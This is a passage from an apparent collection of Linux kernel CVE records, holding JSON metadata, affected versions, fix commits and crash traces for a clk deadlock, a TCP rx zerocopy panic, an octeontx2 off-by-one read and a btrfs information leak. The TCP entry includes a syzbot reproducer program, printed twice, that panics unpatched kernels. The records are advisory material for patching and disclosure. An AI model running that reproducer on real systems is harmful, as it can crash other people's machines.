"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: Get runtime PM before walking tree during disable_unused\n\nDoug reported [1] the following hung task:\n\n INFO: task swapper/0:1 blocked for more than 122 seconds.\n Not tainted 5.15.149-21875-gf795ebc40eb8 #1\n \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n task:swapper/0 state:D stack: 0 pid: 1 ppid: 0 flags:0x00000008\n Call trace:\n __switch_to+0xf4/0x1f4\n __schedule+0x418/0xb80\n schedule+0x5c/0x10c\n rpm_resume+0xe0/0x52c\n rpm_resume+0x178/0x52c\n __pm_runtime_resume+0x58/0x98\n clk_pm_runtime_get+0x30/0xb0\n clk_disable_unused_subtree+0x58/0x208\n clk_disable_unused_subtree+0x38/0x208\n clk_disable_unused_subtree+0x38/0x208\n clk_disable_unused_subtree+0x38/0x208\n clk_disable_unused_subtree+0x38/0x208\n clk_disable_unused+0x4c/0xe4\n do_one_initcall+0xcc/0x2d8\n do_initcall_level+0xa4/0x148\n do_initcalls+0x5c/0x9c\n do_basic_setup+0x24/0x30\n kernel_init_freeable+0xec/0x164\n kernel_init+0x28/0x120\n ret_from_fork+0x10/0x20\n INFO: task kworker/u16:0:9 blocked for more than 122 seconds.\n Not tainted 5.15.149-21875-gf795ebc40eb8 #1\n \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n task:kworker/u16:0 state:D stack: 0 pid: 9 ppid: 2 flags:0x00000008\n Workqueue: events_unbound deferred_probe_work_func\n Call trace:\n __switch_to+0xf4/0x1f4\n __schedule+0x418/0xb80\n schedule+0x5c/0x10c\n schedule_preempt_disabled+0x2c/0x48\n __mutex_lock+0x238/0x488\n __mutex_lock_slowpath+0x1c/0x28\n mutex_lock+0x50/0x74\n clk_prepare_lock+0x7c/0x9c\n clk_core_prepare_lock+0x20/0x44\n clk_prepare+0x24/0x30\n clk_bulk_prepare+0x40/0xb0\n mdss_runtime_resume+0x54/0x1c8\n pm_generic_runtime_resume+0x30/0x44\n __genpd_runtime_resume+0x68/0x7c\n genpd_runtime_resume+0x108/0x1f4\n __rpm_callback+0x84/0x144\n rpm_callback+0x30/0x88\n rpm_resume+0x1f4/0x52c\n rpm_resume+0x178/0x52c\n __pm_runtime_resume+0x58/0x98\n __device_attach+0xe0/0x170\n device_initial_probe+0x1c/0x28\n bus_probe_device+0x3c/0x9c\n device_add+0x644/0x814\n mipi_dsi_device_register_full+0xe4/0x170\n devm_mipi_dsi_device_register_full+0x28/0x70\n ti_sn_bridge_probe+0x1dc/0x2c0\n auxiliary_bus_probe+0x4c/0x94\n really_probe+0xcc/0x2c8\n __driver_probe_device+0xa8/0x130\n driver_probe_device+0x48/0x110\n __device_attach_driver+0xa4/0xcc\n bus_for_each_drv+0x8c/0xd8\n __device_attach+0xf8/0x170\n device_initial_probe+0x1c/0x28\n bus_probe_device+0x3c/0x9c\n deferred_probe_work_func+0x9c/0xd8\n process_one_work+0x148/0x518\n worker_thread+0x138/0x350\n kthread+0x138/0x1e0\n ret_from_fork+0x10/0x20\n\nThe first thread is walking the clk tree and calling\nclk_pm_runtime_get() to power on devices required to read the clk\nhardware via struct clk_ops::is_enabled(). This thread holds the clk\nprepare_lock, and is trying to runtime PM resume a device, when it finds\nthat the device is in the process of resuming so the thread schedule()s\naway waiting for the device to finish resuming before continuing. The\nsecond thread is runtime PM resuming the same device, but the runtime\nresume callback is calling clk_prepare(), trying to grab the\nprepare_lock waiting on the first thread.\n\nThis is a classic ABBA deadlock. To properly fix the deadlock, we must\nnever runtime PM resume or suspend a device with the clk prepare_lock\nheld. Actually doing that is near impossible today because the global\nprepare_lock would have to be dropped in the middle of the tree, the\ndevice runtime PM resumed/suspended, and then the prepare_lock grabbed\nagain to ensure consistency of the clk tree topology. If anything\nchanges with the clk tree in the meantime, we\u0027ve lost and will need to\nstart the operation all over again.\n\nLuckily, most of the time we\u0027re simply incrementing or decrementing the\nruntime PM count on an active device, so we don\u0027t have the chance to\nschedule away with the prepare_lock held. Let\u0027s fix this immediate\nproblem that can be\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:01:57.231Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/253ab38d1ee652a596942156978a233970d185ba"
},
{
"url": "https://git.kernel.org/stable/c/4af115f1a20a3d9093586079206ee37c2ac55123"
},
{
"url": "https://git.kernel.org/stable/c/a29ec0465dce0b871003698698ac6fa92c9a5034"
},
{
"url": "https://git.kernel.org/stable/c/a424e713e0cc33d4b969cfda25b9f46df4d7b5bc"
},
{
"url": "https://git.kernel.org/stable/c/60ff482c4205a5aac3b0595ab794cfd62295dab5"
},
{
"url": "https://git.kernel.org/stable/c/115554862294397590088ba02f11f2aba6d5016c"
},
{
"url": "https://git.kernel.org/stable/c/e581cf5d216289ef292d1a4036d53ce90e122469"
}
],
"title": "clk: Get runtime PM before walking tree during disable_unused",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27004",
"datePublished": "2024-05-01T05:28:54.684Z",
"dateReserved": "2024-02-19T14:20:24.207Z",
"dateUpdated": "2025-11-04T17:16:29.861Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26640 (GCVE-0-2024-26640)
Vulnerability from cvelistv5
Published
2024-03-18 10:19
Modified
2025-05-04 08:52
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tcp: add sanity checks to rx zerocopy
TCP rx zerocopy intent is to map pages initially allocated
from NIC drivers, not pages owned by a fs.
This patch adds to can_map_frag() these additional checks:
- Page must not be a compound one.
- page->mapping must be NULL.
This fixes the panic reported by ZhangPeng.
syzbot was able to loopback packets built with sendfile(),
mapping pages owned by an ext4 file to TCP rx zerocopy.
r3 = socket$inet_tcp(0x2, 0x1, 0x0)
mmap(&(0x7f0000ff9000/0x4000)=nil, 0x4000, 0x0, 0x12, r3, 0x0)
r4 = socket$inet_tcp(0x2, 0x1, 0x0)
bind$inet(r4, &(0x7f0000000000)={0x2, 0x4e24, @multicast1}, 0x10)
connect$inet(r4, &(0x7f00000006c0)={0x2, 0x4e24, @empty}, 0x10)
r5 = openat$dir(0xffffffffffffff9c, &(0x7f00000000c0)='./file0\x00',
0x181e42, 0x0)
fallocate(r5, 0x0, 0x0, 0x85b8)
sendfile(r4, r5, 0x0, 0x8ba0)
getsockopt$inet_tcp_TCP_ZEROCOPY_RECEIVE(r4, 0x6, 0x23,
&(0x7f00000001c0)={&(0x7f0000ffb000/0x3000)=nil, 0x3000, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0}, &(0x7f0000000440)=0x40)
r6 = openat$dir(0xffffffffffffff9c, &(0x7f00000000c0)='./file0\x00',
0x181e42, 0x0)
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 93ab6cc69162775201587cc9da00d5016dc890e2 Version: 93ab6cc69162775201587cc9da00d5016dc890e2 Version: 93ab6cc69162775201587cc9da00d5016dc890e2 Version: 93ab6cc69162775201587cc9da00d5016dc890e2 Version: 93ab6cc69162775201587cc9da00d5016dc890e2 Version: 93ab6cc69162775201587cc9da00d5016dc890e2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26640",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-18T14:20:07.780920Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:57.803Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.826Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f48bf9a83b1666d934247cb58a9887d7b3127b6f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/718f446e60316bf606946f7f42367d691d21541e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b383d4ea272fe5795877506dcce5aad1f6330e5e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d15cc0f66884ef2bed28c7ccbb11c102aa3a0760"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1b8adcc0e2c584fec778add7777fe28e20781e60"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/577e4432f3ac810049cb7e6b71f4d96ec7c6e894"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/tcp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f48bf9a83b1666d934247cb58a9887d7b3127b6f",
"status": "affected",
"version": "93ab6cc69162775201587cc9da00d5016dc890e2",
"versionType": "git"
},
{
"lessThan": "718f446e60316bf606946f7f42367d691d21541e",
"status": "affected",
"version": "93ab6cc69162775201587cc9da00d5016dc890e2",
"versionType": "git"
},
{
"lessThan": "b383d4ea272fe5795877506dcce5aad1f6330e5e",
"status": "affected",
"version": "93ab6cc69162775201587cc9da00d5016dc890e2",
"versionType": "git"
},
{
"lessThan": "d15cc0f66884ef2bed28c7ccbb11c102aa3a0760",
"status": "affected",
"version": "93ab6cc69162775201587cc9da00d5016dc890e2",
"versionType": "git"
},
{
"lessThan": "1b8adcc0e2c584fec778add7777fe28e20781e60",
"status": "affected",
"version": "93ab6cc69162775201587cc9da00d5016dc890e2",
"versionType": "git"
},
{
"lessThan": "577e4432f3ac810049cb7e6b71f4d96ec7c6e894",
"status": "affected",
"version": "93ab6cc69162775201587cc9da00d5016dc890e2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv4/tcp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.18"
},
{
"lessThan": "4.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: add sanity checks to rx zerocopy\n\nTCP rx zerocopy intent is to map pages initially allocated\nfrom NIC drivers, not pages owned by a fs.\n\nThis patch adds to can_map_frag() these additional checks:\n\n- Page must not be a compound one.\n- page-\u003emapping must be NULL.\n\nThis fixes the panic reported by ZhangPeng.\n\nsyzbot was able to loopback packets built with sendfile(),\nmapping pages owned by an ext4 file to TCP rx zerocopy.\n\nr3 = socket$inet_tcp(0x2, 0x1, 0x0)\nmmap(\u0026(0x7f0000ff9000/0x4000)=nil, 0x4000, 0x0, 0x12, r3, 0x0)\nr4 = socket$inet_tcp(0x2, 0x1, 0x0)\nbind$inet(r4, \u0026(0x7f0000000000)={0x2, 0x4e24, @multicast1}, 0x10)\nconnect$inet(r4, \u0026(0x7f00000006c0)={0x2, 0x4e24, @empty}, 0x10)\nr5 = openat$dir(0xffffffffffffff9c, \u0026(0x7f00000000c0)=\u0027./file0\\x00\u0027,\n 0x181e42, 0x0)\nfallocate(r5, 0x0, 0x0, 0x85b8)\nsendfile(r4, r5, 0x0, 0x8ba0)\ngetsockopt$inet_tcp_TCP_ZEROCOPY_RECEIVE(r4, 0x6, 0x23,\n \u0026(0x7f00000001c0)={\u0026(0x7f0000ffb000/0x3000)=nil, 0x3000, 0x0, 0x0, 0x0,\n 0x0, 0x0, 0x0, 0x0}, \u0026(0x7f0000000440)=0x40)\nr6 = openat$dir(0xffffffffffffff9c, \u0026(0x7f00000000c0)=\u0027./file0\\x00\u0027,\n 0x181e42, 0x0)"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:52:52.723Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f48bf9a83b1666d934247cb58a9887d7b3127b6f"
},
{
"url": "https://git.kernel.org/stable/c/718f446e60316bf606946f7f42367d691d21541e"
},
{
"url": "https://git.kernel.org/stable/c/b383d4ea272fe5795877506dcce5aad1f6330e5e"
},
{
"url": "https://git.kernel.org/stable/c/d15cc0f66884ef2bed28c7ccbb11c102aa3a0760"
},
{
"url": "https://git.kernel.org/stable/c/1b8adcc0e2c584fec778add7777fe28e20781e60"
},
{
"url": "https://git.kernel.org/stable/c/577e4432f3ac810049cb7e6b71f4d96ec7c6e894"
}
],
"title": "tcp: add sanity checks to rx zerocopy",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26640",
"datePublished": "2024-03-18T10:19:07.025Z",
"dateReserved": "2024-02-19T14:20:24.137Z",
"dateUpdated": "2025-05-04T08:52:52.723Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36957 (GCVE-0-2024-36957)
Vulnerability from cvelistv5
Published
2024-05-30 15:35
Modified
2025-05-04 12:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
octeontx2-af: avoid off-by-one read from userspace
We try to access count + 1 byte from userspace with memdup_user(buffer,
count + 1). However, the userspace only provides buffer of count bytes and
only these count bytes are verified to be okay to access. To ensure the
copied buffer is NUL terminated, we use memdup_user_nul instead.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: dae49384d0d7695540e2d75168f323cef1384810 Version: 3a2eb515d1367c0f667b76089a6e727279c688b8 Version: 3a2eb515d1367c0f667b76089a6e727279c688b8 Version: 3a2eb515d1367c0f667b76089a6e727279c688b8 Version: 3a2eb515d1367c0f667b76089a6e727279c688b8 Version: 3a2eb515d1367c0f667b76089a6e727279c688b8 Version: c9a2ed3fdd037314a71e6a6ba5d99a3605f6f9c7 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36957",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-05T18:14:35.481589Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-05T18:14:45.699Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:43:50.509Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bcdac70adceb44373da204c3c297f2a98e13216e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ec697fbd38cbe2eef0948b58673b146caa95402f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8f11fe3ea3fc261640cfc8a5addd838000407c67"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0a0285cee11c7dcc2657bcd456e469958a5009e7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fc3e0076c1f82fe981d321e3a7bad4cbee542c19"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f299ee709fb45036454ca11e90cb2810fe771878"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "bcdac70adceb44373da204c3c297f2a98e13216e",
"status": "affected",
"version": "dae49384d0d7695540e2d75168f323cef1384810",
"versionType": "git"
},
{
"lessThan": "ec697fbd38cbe2eef0948b58673b146caa95402f",
"status": "affected",
"version": "3a2eb515d1367c0f667b76089a6e727279c688b8",
"versionType": "git"
},
{
"lessThan": "8f11fe3ea3fc261640cfc8a5addd838000407c67",
"status": "affected",
"version": "3a2eb515d1367c0f667b76089a6e727279c688b8",
"versionType": "git"
},
{
"lessThan": "0a0285cee11c7dcc2657bcd456e469958a5009e7",
"status": "affected",
"version": "3a2eb515d1367c0f667b76089a6e727279c688b8",
"versionType": "git"
},
{
"lessThan": "fc3e0076c1f82fe981d321e3a7bad4cbee542c19",
"status": "affected",
"version": "3a2eb515d1367c0f667b76089a6e727279c688b8",
"versionType": "git"
},
{
"lessThan": "f299ee709fb45036454ca11e90cb2810fe771878",
"status": "affected",
"version": "3a2eb515d1367c0f667b76089a6e727279c688b8",
"versionType": "git"
},
{
"status": "affected",
"version": "c9a2ed3fdd037314a71e6a6ba5d99a3605f6f9c7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.12"
},
{
"lessThan": "5.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "5.10.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.11.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-af: avoid off-by-one read from userspace\n\nWe try to access count + 1 byte from userspace with memdup_user(buffer,\ncount + 1). However, the userspace only provides buffer of count bytes and\nonly these count bytes are verified to be okay to access. To ensure the\ncopied buffer is NUL terminated, we use memdup_user_nul instead."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:34.681Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/bcdac70adceb44373da204c3c297f2a98e13216e"
},
{
"url": "https://git.kernel.org/stable/c/ec697fbd38cbe2eef0948b58673b146caa95402f"
},
{
"url": "https://git.kernel.org/stable/c/8f11fe3ea3fc261640cfc8a5addd838000407c67"
},
{
"url": "https://git.kernel.org/stable/c/0a0285cee11c7dcc2657bcd456e469958a5009e7"
},
{
"url": "https://git.kernel.org/stable/c/fc3e0076c1f82fe981d321e3a7bad4cbee542c19"
},
{
"url": "https://git.kernel.org/stable/c/f299ee709fb45036454ca11e90cb2810fe771878"
}
],
"title": "octeontx2-af: avoid off-by-one read from userspace",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36957",
"datePublished": "2024-05-30T15:35:50.445Z",
"dateReserved": "2024-05-30T15:25:07.080Z",
"dateUpdated": "2025-05-04T12:56:34.681Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35849 (GCVE-0-2024-35849)
Vulnerability from cvelistv5
Published
2024-05-17 14:47
Modified
2025-05-04 09:06
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
btrfs: fix information leak in btrfs_ioctl_logical_to_ino()
Syzbot reported the following information leak for in
btrfs_ioctl_logical_to_ino():
BUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline]
BUG: KMSAN: kernel-infoleak in _copy_to_user+0xbc/0x110 lib/usercopy.c:40
instrument_copy_to_user include/linux/instrumented.h:114 [inline]
_copy_to_user+0xbc/0x110 lib/usercopy.c:40
copy_to_user include/linux/uaccess.h:191 [inline]
btrfs_ioctl_logical_to_ino+0x440/0x750 fs/btrfs/ioctl.c:3499
btrfs_ioctl+0x714/0x1260
vfs_ioctl fs/ioctl.c:51 [inline]
__do_sys_ioctl fs/ioctl.c:904 [inline]
__se_sys_ioctl+0x261/0x450 fs/ioctl.c:890
__x64_sys_ioctl+0x96/0xe0 fs/ioctl.c:890
x64_sys_call+0x1883/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:17
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x77/0x7f
Uninit was created at:
__kmalloc_large_node+0x231/0x370 mm/slub.c:3921
__do_kmalloc_node mm/slub.c:3954 [inline]
__kmalloc_node+0xb07/0x1060 mm/slub.c:3973
kmalloc_node include/linux/slab.h:648 [inline]
kvmalloc_node+0xc0/0x2d0 mm/util.c:634
kvmalloc include/linux/slab.h:766 [inline]
init_data_container+0x49/0x1e0 fs/btrfs/backref.c:2779
btrfs_ioctl_logical_to_ino+0x17c/0x750 fs/btrfs/ioctl.c:3480
btrfs_ioctl+0x714/0x1260
vfs_ioctl fs/ioctl.c:51 [inline]
__do_sys_ioctl fs/ioctl.c:904 [inline]
__se_sys_ioctl+0x261/0x450 fs/ioctl.c:890
__x64_sys_ioctl+0x96/0xe0 fs/ioctl.c:890
x64_sys_call+0x1883/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:17
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x77/0x7f
Bytes 40-65535 of 65536 are uninitialized
Memory access of size 65536 starts at ffff888045a40000
This happens, because we're copying a 'struct btrfs_data_container' back
to user-space. This btrfs_data_container is allocated in
'init_data_container()' via kvmalloc(), which does not zero-fill the
memory.
Fix this by using kvzalloc() which zeroes out the memory on allocation.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35849",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-23T19:26:21.803612Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:01.668Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.438Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/689efe22e9b5b7d9d523119a9a5c3c17107a0772"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/73db209dcd4ae026021234d40cfcb2fb5b564b86"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/30189e54ba80e3209d34cfeea87b848f6ae025e6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e58047553a4e859dafc8d1d901e1de77c9dd922d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8bdbcfaf3eac42f98e5486b3d7e130fa287811f6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3a63cee1a5e14a3e52c19142c61dd5fcb524f6dc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fddc19631c51d9c17d43e9f822a7bc403af88d54"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2f7ef5bb4a2f3e481ef05fab946edb97c84f67cf"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/btrfs/backref.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
